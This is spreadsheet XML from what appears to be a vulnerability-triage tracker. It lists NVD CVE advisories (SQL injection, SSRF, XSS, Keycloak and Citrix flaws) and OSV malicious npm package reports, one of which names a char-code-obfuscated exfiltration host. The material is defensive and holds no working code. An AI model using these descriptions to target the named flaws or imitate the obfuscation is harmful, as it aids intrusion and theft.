      <c r="N40" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O40" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P40" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q40" s="5" t="inlineStr"/>
      <c r="R40" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S40" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was detected in kishor-23 food-waste-management-system 411989e3ecb82895e53dca7865f72145f03d7d93/b3a70b2c492dc9904de5be1ad9389bd79b87f82c. The affected element is an unknown function of the file admin/signup.php of the component Admin Registration. The manipulation of the argument email/username/location results in sql injection. It is possible to launch the attack remotely. The exploit is now public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T40" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105231</t>
        </is>
      </c>
    </row>
    <row r="41">
      <c r="A41" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B41" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C41" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105232</t>
        </is>
      </c>
      <c r="D41" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E41" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F41" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G41" s="5" t="inlineStr"/>
      <c r="H41" s="5" t="inlineStr"/>
      <c r="I41" s="5" t="inlineStr"/>
      <c r="J41" s="5" t="inlineStr"/>
      <c r="K41" s="5" t="inlineStr"/>
      <c r="L41" s="5" t="inlineStr"/>
      <c r="M41" s="5" t="inlineStr"/>
      <c r="N41" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O41" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P41" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q41" s="5" t="inlineStr"/>
      <c r="R41" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S41" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in kishor-23 food-waste-management-system 411989e3ecb82895e53dca7865f72145f03d7d93/b3a70b2c492dc9904de5be1ad9389bd79b87f82c. The impacted element is an unknown function of the file delivery/deliverysignup.php of the component Registration Page. This manipulation of the argument username/email/location causes sql injection. The attack can be initiated remotely. The exploit has been published and may be used. Continious delivery with rolling releases is used by this product. Therefore, no version details of affected nor updated releases are available. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="T41" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105232</t>
        </is>
      </c>
    </row>
    <row r="42">
      <c r="A42" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B42" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C42" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105238</t>
        </is>
      </c>
      <c r="D42" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E42" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F42" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G42" s="5" t="inlineStr"/>
      <c r="H42" s="5" t="inlineStr"/>
      <c r="I42" s="5" t="inlineStr"/>
      <c r="J42" s="5" t="inlineStr"/>
      <c r="K42" s="5" t="inlineStr"/>
      <c r="L42" s="5" t="inlineStr"/>
      <c r="M42" s="5" t="inlineStr"/>
      <c r="N42" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O42" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P42" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q42" s="5" t="inlineStr"/>
      <c r="R42" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S42" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in ChatGPTNextWeb NextChat up to 2.16.1. This vulnerability affects the function proxyHandler of the file app/api/proxy.ts of the component Proxy Fallback Handler. This manipulation of the argument x-base-url causes server-side request forgery. It is possible to initiate the attack remotely. The exploit has been published and may be used. The pull request to fix this issue awaits acceptance.</t>
        </is>
      </c>
      <c r="T42" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105238</t>
        </is>
      </c>
    </row>
    <row r="43">
      <c r="A43" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B43" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C43" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105246</t>
        </is>
      </c>
      <c r="D43" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E43" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F43" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G43" s="5" t="inlineStr"/>
      <c r="H43" s="5" t="inlineStr"/>
      <c r="I43" s="5" t="inlineStr"/>
      <c r="J43" s="5" t="inlineStr"/>
      <c r="K43" s="5" t="inlineStr"/>
      <c r="L43" s="5" t="inlineStr"/>
      <c r="M43" s="5" t="inlineStr"/>
      <c r="N43" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O43" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P43" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q43" s="5" t="inlineStr"/>
      <c r="R43" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S43" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was found in SourceCodester Online Reviewer Management System 1.0. Impacted is an unknown function of the file /reviewer_0/admins/assessments/Subject/btn_functions.php?action=update. Performing a manipulation of the argument Subject results in sql injection. The attack can be initiated remotely. The exploit has been made public and could be used.</t>
        </is>
      </c>
      <c r="T43" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105246</t>
        </is>
      </c>
    </row>
    <row r="44">
      <c r="A44" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B44" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C44" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103062</t>
        </is>
      </c>
      <c r="D44" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E44" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F44" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G44" s="5" t="inlineStr"/>
      <c r="H44" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I44" s="5" t="inlineStr"/>
      <c r="J44" s="5" t="inlineStr"/>
      <c r="K44" s="5" t="inlineStr"/>
      <c r="L44" s="5" t="inlineStr"/>
      <c r="M44" s="5" t="inlineStr"/>
      <c r="N44" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O44" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P44" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q44" s="5" t="inlineStr"/>
      <c r="R44" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S44" s="5" t="inlineStr">
        <is>
          <t>Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Cozmoslabs TranslatePress translatepress-multilingual allows Stored XSS.This issue affects TranslatePress: from n/a through 3.3.6.</t>
        </is>
      </c>
      <c r="T44" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103062</t>
        </is>
      </c>
    </row>
    <row r="45">
      <c r="A45" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B45" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C45" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103344</t>
        </is>
      </c>
      <c r="D45" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E45" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F45" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G45" s="5" t="inlineStr"/>
      <c r="H45" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I45" s="5" t="inlineStr"/>
      <c r="J45" s="5" t="inlineStr"/>
      <c r="K45" s="5" t="inlineStr"/>
      <c r="L45" s="5" t="inlineStr"/>
      <c r="M45" s="5" t="inlineStr"/>
      <c r="N45" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O45" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P45" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q45" s="5" t="inlineStr"/>
      <c r="R45" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S4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45" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103344</t>
        </is>
      </c>
    </row>
    <row r="46">
      <c r="A46" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B46" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C46" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103354</t>
        </is>
      </c>
      <c r="D46" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E46" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F46" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G46" s="5" t="inlineStr"/>
      <c r="H46" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I46" s="5" t="inlineStr"/>
      <c r="J46" s="5" t="inlineStr"/>
      <c r="K46" s="5" t="inlineStr"/>
      <c r="L46" s="5" t="inlineStr"/>
      <c r="M46" s="5" t="inlineStr"/>
      <c r="N46" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O46" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P46" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q46" s="5" t="inlineStr"/>
      <c r="R46" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S46" s="5" t="inlineStr">
        <is>
          <t>Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Liquid Web / StellarWP Gutenberg Blocks by Kadence Blocks kadence-blocks allows Stored XSS.This issue affects Gutenberg Blocks by Kadence Blocks: from n/a through 3.7.11.1.</t>
        </is>
      </c>
      <c r="T46" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103354</t>
        </is>
      </c>
    </row>
    <row r="47">
      <c r="A47" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B47" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C47" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97276</t>
        </is>
      </c>
      <c r="D47" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E47" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F47" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G47" s="5" t="inlineStr"/>
      <c r="H47" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I47" s="5" t="inlineStr"/>
      <c r="J47" s="5" t="inlineStr"/>
      <c r="K47" s="5" t="inlineStr"/>
      <c r="L47" s="5" t="inlineStr"/>
      <c r="M47" s="5" t="inlineStr"/>
      <c r="N47" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O47" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P47" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q47" s="5" t="inlineStr"/>
      <c r="R47" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S47" s="5" t="inlineStr">
        <is>
          <t>Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in VeronaLabs WP Statistics wp-statistics allows Reflected XSS.This issue affects WP Statistics: from n/a through 14.16.14.</t>
        </is>
      </c>
      <c r="T47" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97276</t>
        </is>
      </c>
    </row>
  </sheetData>
  <autoFilter ref="A1:T47"/>
  <conditionalFormatting sqref="E2:E47">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47">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P3 - Medium</t>
        </is>
      </c>
      <c r="B2" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C2" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105223</t>
        </is>
      </c>
      <c r="D2" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E2" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F2" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G2" s="5" t="inlineStr"/>
      <c r="H2" s="5" t="inlineStr"/>
      <c r="I2" s="5" t="inlineStr"/>
      <c r="J2" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="K2" s="5" t="inlineStr"/>
      <c r="L2" s="5" t="inlineStr"/>
      <c r="M2" s="5" t="inlineStr"/>
      <c r="N2" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O2" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P2" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q2" s="5" t="inlineStr"/>
      <c r="R2" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="S2" s="5" t="inlineStr">
        <is>
          <t>maclof kubernetes-client 0.17.0 before 0.32.0 disables TLS certificate verification in parseKubeconfig() and parseKubeconfigFile() when a kubeconfig lacks certificate-authority-data, ignoring insecure-skip-tls-verify. On-path attackers can impersonate the Kubernetes API server to capture Bearer tokens or Basic credentials and tamper with WebSocket or REST API traffic.</t>
        </is>
      </c>
      <c r="T2" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105223</t>
        </is>
      </c>
    </row>
    <row r="3">
      <c r="A3" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C3" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105306</t>
        </is>
      </c>
      <c r="D3" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E3" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F3" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G3" s="5" t="inlineStr"/>
      <c r="H3" s="5" t="inlineStr"/>
      <c r="I3" s="5" t="inlineStr"/>
      <c r="J3" s="5" t="inlineStr">
        <is>
          <t>keycloak</t>
        </is>
      </c>
      <c r="K3" s="5" t="inlineStr"/>
      <c r="L3" s="5" t="inlineStr"/>
      <c r="M3" s="5" t="inlineStr"/>
      <c r="N3" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O3" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P3" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q3" s="5" t="inlineStr"/>
      <c r="R3" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S3" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in the Dynamic Client Registration flow of the Keycloak identity and access management server. The issue occurs because the registration process fails to filter security-sensitive client attributes when a new client is created. An attacker with a valid Initial Access Token can register a client that bypasses audience checks during token introspection. This allows the attacker to view sensitive identity information, roles, and session details from access tokens belonging to other applications in the same realm.</t>
        </is>
      </c>
      <c r="T3" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105306</t>
        </is>
      </c>
    </row>
    <row r="4">
      <c r="A4" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C4" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105302</t>
        </is>
      </c>
      <c r="D4" s="5" t="n">
        <v>5.7</v>
      </c>
      <c r="E4" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F4" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G4" s="5" t="inlineStr"/>
      <c r="H4" s="5" t="inlineStr"/>
      <c r="I4" s="5" t="inlineStr"/>
      <c r="J4" s="5" t="inlineStr">
        <is>
          <t>keycloak</t>
        </is>
      </c>
      <c r="K4" s="5" t="inlineStr"/>
      <c r="L4" s="5" t="inlineStr"/>
      <c r="M4" s="5" t="inlineStr"/>
      <c r="N4" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O4" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P4" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q4" s="5" t="inlineStr"/>
      <c r="R4" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="S4" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in the User Session Note mapper of the Keycloak identity and access management solution. The issue occurs because the mapper does not validate whether a requested session note contains sensitive internal credentials, such as federated access tokens from external identity providers. This allows a delegated client administrator to leak a user's upstream bearer tokens into the tokens issued to their managed application, potentially leading to unauthorized access to the user's data on external platforms.</t>
        </is>
      </c>
      <c r="T4" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105302</t>
        </is>
      </c>
    </row>
    <row r="5">
      <c r="A5" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C5" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105301</t>
        </is>
      </c>
      <c r="D5" s="5" t="n">
        <v>4</v>
      </c>
      <c r="E5" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F5" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G5" s="5" t="inlineStr"/>
      <c r="H5" s="5" t="inlineStr"/>
      <c r="I5" s="5" t="inlineStr"/>
      <c r="J5" s="5" t="inlineStr">
        <is>
          <t>keycloak</t>
        </is>
      </c>
      <c r="K5" s="5" t="inlineStr"/>
      <c r="L5" s="5" t="inlineStr"/>
      <c r="M5" s="5" t="inlineStr"/>
      <c r="N5" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O5" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P5" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q5" s="5" t="inlineStr"/>
      <c r="R5" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S5" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in the X.509 client-certificate authenticator of Keycloak, a solution for identity and access management. The issue occurs when the server is configured to check certificate revocation using CRL Distribution Points or OCSP. An attacker can provide a specially crafted certificate that points to a malicious server, causing Keycloak to make unauthorized outbound requests to internal or external endpoints before the certificate is fully validated. This can lead to a blind server-side request forgery (SSRF) attack.</t>
        </is>
      </c>
      <c r="T5" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105301</t>
        </is>
      </c>
    </row>
    <row r="6">
      <c r="A6" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B6" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C6" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88779</t>
        </is>
      </c>
      <c r="D6" s="5" t="inlineStr"/>
      <c r="E6" s="5" t="inlineStr"/>
      <c r="F6" s="5" t="inlineStr"/>
      <c r="G6" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H6" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I6" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J6" s="5" t="inlineStr">
        <is>
          <t>citrix</t>
        </is>
      </c>
      <c r="K6" s="5" t="inlineStr">
        <is>
          <t>citrix:netscaler</t>
        </is>
      </c>
      <c r="L6" s="5" t="inlineStr"/>
      <c r="M6" s="5" t="inlineStr"/>
      <c r="N6" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O6" s="5" t="inlineStr"/>
      <c r="P6" s="5" t="inlineStr"/>
      <c r="Q6" s="5" t="inlineStr">
        <is>
          <t>2026-10-07</t>
        </is>
      </c>
      <c r="R6" s="5" t="inlineStr">
        <is>
          <t>CWE-119</t>
        </is>
      </c>
      <c r="S6" s="5" t="inlineStr">
        <is>
          <t>Citrix NetScaler ADC (formerly Citrix ADC) and Citrix NetScaler Gateway (formerly Citrix Gateway) contain an improper restriction of operations within the bounds of a memory buffer vulnerability that could allow for a denial of service.</t>
        </is>
      </c>
      <c r="T6" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88779</t>
        </is>
      </c>
    </row>
  </sheetData>
  <autoFilter ref="A1:T6"/>
  <conditionalFormatting sqref="E2:E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0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MAL-2026-17343</t>
        </is>
      </c>
      <c r="D2" s="5" t="inlineStr"/>
      <c r="E2" s="5" t="inlineStr"/>
      <c r="F2" s="5" t="inlineStr"/>
      <c r="G2" s="5" t="inlineStr"/>
      <c r="H2" s="5" t="inlineStr"/>
      <c r="I2" s="5" t="inlineStr"/>
      <c r="J2" s="5" t="inlineStr"/>
      <c r="K2" s="5" t="inlineStr"/>
      <c r="L2" s="5" t="inlineStr">
        <is>
          <t>npm:@bellaxchuu/crystalred</t>
        </is>
      </c>
      <c r="M2" s="5" t="inlineStr"/>
      <c r="N2" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O2" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P2" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q2" s="5" t="inlineStr"/>
      <c r="R2" s="5" t="inlineStr"/>
      <c r="S2"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@bellaxchuu/crystalred (npm), version(s): 0.1.2.
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (db80e6c4fd1d63c2fd93dd289e6a09d2e17d90e1472a6e172b453a213d63ee01)
package.json declares the `libsignal` dependency as `github:Bellaxata/libsignal-node` with no commit SHA, tag, or semver pin. On `npm install`, this resolves to the current HEAD of that GitHub repository and executes whatever lifecycle scripts and code that repo ships at fetch time. Because the source is off-registry and integrity-unchecked, the executed code can change at any moment without a version bump of @bellaxchuu/crystalred, giving the account controlling Bellaxata/libsignal-node arbitrary code execution on any machine installing this package.
</t>
        </is>
      </c>
      <c r="T2" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17343</t>
        </is>
      </c>
    </row>
    <row r="3">
      <c r="A3" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C3" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17383</t>
        </is>
      </c>
      <c r="D3" s="5" t="inlineStr"/>
      <c r="E3" s="5" t="inlineStr"/>
      <c r="F3" s="5" t="inlineStr"/>
      <c r="G3" s="5" t="inlineStr"/>
      <c r="H3" s="5" t="inlineStr"/>
      <c r="I3" s="5" t="inlineStr"/>
      <c r="J3" s="5" t="inlineStr"/>
      <c r="K3" s="5" t="inlineStr"/>
      <c r="L3" s="5" t="inlineStr">
        <is>
          <t>npm:@xatancchii/velycxbail</t>
        </is>
      </c>
      <c r="M3" s="5" t="inlineStr"/>
      <c r="N3" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O3" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P3" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q3" s="5" t="inlineStr"/>
      <c r="R3" s="5" t="inlineStr"/>
      <c r="S3"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@xatancchii/velycxbail (npm), version(s): 1.1.0.
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (594062e4a945ccd7c67e7a5f03085fbd2eecda766d5347b81e7012399fb1f447)
package.json declares `"libsignal": "npm:@bellaxchuu/libsignal-node@latest"`, aliasing the Signal-protocol crypto dependency to a package published under the unrelated `@bellaxchuu` scope with the mutable `latest` tag and no integrity check. Every `npm install` of @xatancchii/velycxbail resolves libsignal to whatever the current head of `@bellaxchuu/libsignal-node` is at install time. The aliased package is consumed by lib/Utils/crypto.js, which is reached from the main entry through the Utils layer, so arbitrary future content published to that third-party scope loads and executes as part of normal use. The scope does not match the Baileys/WhatsApp publisher chain the fork claims to derive from, so control over the code path executed on installers rests with an unrelated third party.
</t>
        </is>
      </c>
      <c r="T3" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17383</t>
        </is>
      </c>
    </row>
    <row r="4">
      <c r="A4" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C4" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17404</t>
        </is>
      </c>
      <c r="D4" s="5" t="inlineStr"/>
      <c r="E4" s="5" t="inlineStr"/>
      <c r="F4" s="5" t="inlineStr"/>
      <c r="G4" s="5" t="inlineStr"/>
      <c r="H4" s="5" t="inlineStr"/>
      <c r="I4" s="5" t="inlineStr"/>
      <c r="J4" s="5" t="inlineStr"/>
      <c r="K4" s="5" t="inlineStr"/>
      <c r="L4" s="5" t="inlineStr">
        <is>
          <t>npm:saturn-baileys</t>
        </is>
      </c>
      <c r="M4" s="5" t="inlineStr"/>
      <c r="N4" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O4" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P4" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q4" s="5" t="inlineStr"/>
      <c r="R4" s="5" t="inlineStr"/>
      <c r="S4"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saturn-baileys (npm), version(s): 1.0.0.
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (098af0c774d7e3d1a8b2da57e35d5e2686e2149ad6f01fa13803cd1a54325058)
saturn-baileys is a fork of the Baileys WhatsApp library. In lib/Socket/messages-send.js at lines 425 and 436, a network destination is reconstructed at runtime from a String.fromCharCode(...) decimal array rather than appearing as a plain string literal. The decoded value is the URL https://fiora.nixel.my.id/. The obfuscation is placed inside the message-send code path of a messaging library that handles user credentials, session data, and message content, and the destination is not a documented WhatsApp/Baileys endpoint. Reconstructing a hardcoded non-first-party host via char-code decoding inside a send routine is the exfiltration/silent-relay shape for messaging-library trojans and is inconsistent with any legitimate use in this location.
</t>
        </is>
      </c>
      <c r="T4" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17404</t>
        </is>
      </c>
    </row>
    <row r="5">
      <c r="A5" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C5" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17405</t>
        </is>
      </c>
      <c r="D5" s="5" t="inlineStr"/>
      <c r="E5" s="5" t="inlineStr"/>
      <c r="F5" s="5" t="inlineStr"/>
      <c r="G5" s="5" t="inlineStr"/>
      <c r="H5" s="5" t="inlineStr"/>
      <c r="I5" s="5" t="inlineStr"/>
